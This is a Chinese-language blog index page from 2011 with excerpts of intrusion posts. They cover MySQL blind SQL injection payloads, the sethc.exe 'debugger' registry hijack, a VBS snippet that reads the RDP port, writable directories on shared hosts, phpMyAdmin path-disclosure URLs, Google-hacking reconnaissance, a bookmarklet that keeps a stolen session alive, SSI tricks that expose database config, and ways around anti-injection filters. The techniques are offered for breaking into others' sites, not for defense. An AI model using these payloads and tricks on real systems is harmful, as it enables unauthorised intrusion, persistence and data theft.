上一页 1 ··· 8 9 10 11 12 13 14 15 16 ··· 24 下一页

2011年5月1日

mysql 不支持union select 的盲注方法

摘要: 猜解数据库长度and Length((database()))<10 //小于12返回正常说明数据库是12位以下and length((database()))<8 //小于8返回错误说明数据库名是9位的猜解数据库名and ascii(substring((database()),1,1))=100 //100的ascii码=d,说明不是dand ascii(substring((database()),1,1))=122 //122存在说明数据库名第一位是zand ascii(substring((database()),2,1))=114 返回错误说明不是ascii码114=r 阅读全文

posted @ 2011-05-01 23:59 小宝哥哥 阅读(412) 评论(0) 推荐(0) 编辑

2011年4月27日

入侵常用vbs提权

摘要: 3389端口查询 Dim ReadComputerName Set ReadComputerName=WScript.CreateObject("WScript.Shell") Dim TSName,TSRegPath TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" TSName=ReadComputerName.RegRead(TSRegPath) WScript.Echo("TermService 阅读全文

posted @ 2011-04-27 13:12 小宝哥哥 阅读(642) 评论(0) 推荐(1) 编辑

命令行下操作注册表劫持sethc提权

摘要: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"/v debugger /d taskmgr.exe /fWindows 控制台注册表工具 - 版本 3.0格式就是:REG Operation 参数列表返回代码: 0 - 成功 1 - 失败 (除了 REG COMPARE)Operation 有11个,可以这样得到帮助:REG Operation /?REG QUERYREG ADDREG DELETEREG COPYREG S 阅读全文

posted @ 2011-04-27 13:06 小宝哥哥 阅读(679) 评论(0) 推荐(0) 编辑

星外虚拟主机可写目录总结

摘要: C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\C:\php\PEAR\C:\Program Files\Zend\ZendOptimizer-3.3.0\ C:\Program Files\Common Files\C:\7i24.com\iissafe\log\ C:\RECYCLERC:\windows\temp\ c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\e:\recycler\f:\recycler\C:\P 阅读全文

posted @ 2011-04-27 12:37 小宝哥哥 阅读(236) 评论(0) 推荐(0) 编辑

辛苦整理的各类网站系统暴物理路径漏洞

摘要: Phpmyadmin暴路径:phpmyadmin/libraries/select_lang.lib.php 得到物理路径phpmyadmin/themes/darkblue_orange/layout.inc.phpphpmyadmin/index.php?lang[]=1phpMyAdmin/phpinfo.phpphpmyadmin/libraries/mcrypt.lib.phpphpmyadmin/libraries/export/xls.phpphpmyadmin/libraries/lect_lang.lib.phpPhpmyadmin最新重定向漏洞:error.php?type 阅读全文

posted @ 2011-04-27 04:02 小宝哥哥 阅读(2203) 评论(0) 推荐(1) 编辑

google hack渗透全过程

摘要: 利用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。------------------------------------------------首先用google先看这个站点的一些基本情况(一些细节部分就略去了):site:xxxx.com从返回的信息中,找到几个该校的几个系院的域名:http//a1.xxxx.comhttp//a2.xxxx.comhttp//a3.xxxx.comhttp//a4.xxxx.com顺便ping了一下,应该是在不同的服务器.学校一般都会有不少好的资料,先看看有什么好东西没site:xxxx.com fi 阅读全文

posted @ 2011-04-27 04:01 小宝哥哥 阅读(847) 评论(0) 推荐(0) 编辑

维持Session的另类方法

摘要: 拿到偷到的session登陆后,再地址栏敲入下面代码,即可保证session不被服务器因超时注销.javascript:(function%20sogili()%20%7B%0A%20%20%20%20setInterval(function%20()%20%7B_%20%3D%20new%20XMLHttpRequest%20%7C%7C%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22)%3B_.open(%22GET%22%2C%20location)%3B_.send(null)%3B%7D%2C%2060000)%3B%0A%7D)();这段 阅读全文

posted @ 2011-04-27 03:57 小宝哥哥 阅读(140) 评论(0) 推荐(0) 编辑

当网站不能上传asp,asa时

摘要: 当网站不允许上传asp cer cdx htr等文件时, 上传一个stm文件, 内容为:<!--#include file="conn.asp"-->直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦! 并且又看了那篇shtml的介绍后,恍然大悟,终于明白了!原来就是如上所说的,<!--#include file="conn.asp"-->就是一条SSI指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.htm其中的内 阅读全文

posted @ 2011-04-27 03:56 小宝哥哥 阅读(818) 评论(0) 推荐(0) 编辑

ASP绕过防注入的新思路

摘要: 要想绕过防注入,就要打碎关键字。假如有类似这么一段防注入代码:<%id=request("id")id=replace(id,"and","")··· ··· //过滤其它的危险关键字id=replace(id," ","")id=replace(id,",","")//过滤空格和逗号,这是使用本方法必须的条件%>你还有办法注入吗?以打碎关键字“and"为例,咱大可以这样:t 阅读全文

posted @ 2011-04-27 03:47 小宝哥哥 阅读(585) 评论(0) 推荐(0) 编辑

PHP站点渗透常用搜集信息

摘要: 当你看到一个php站点时候除了在google上利用site,filetype等常用办法收集网站物理路径信息的同时不妨尝试一下以下办法,有时候会有意想不到的收获(前面加网站的url): /phpinfo.php *显示php配置信息 /test.php *有些网站管理员架设好php网站的测试页面,里面通常都是phpinfo的信息 /info.php *有些php网站系统自带的,可以显示php配置信息 /help.php *有些php网站目录自带的/ok.php/php.php /setup.php*有些php网站系统安装目录自带的,有时会报错 /install.php /config/phpin 阅读全文

posted @ 2011-04-27 03:44 小宝哥哥 阅读(607) 评论(0) 推荐(0) 编辑

上一页 1 ··· 8 9 10 11 12 13 14 15 16 ··· 24 下一页

导航

Tasup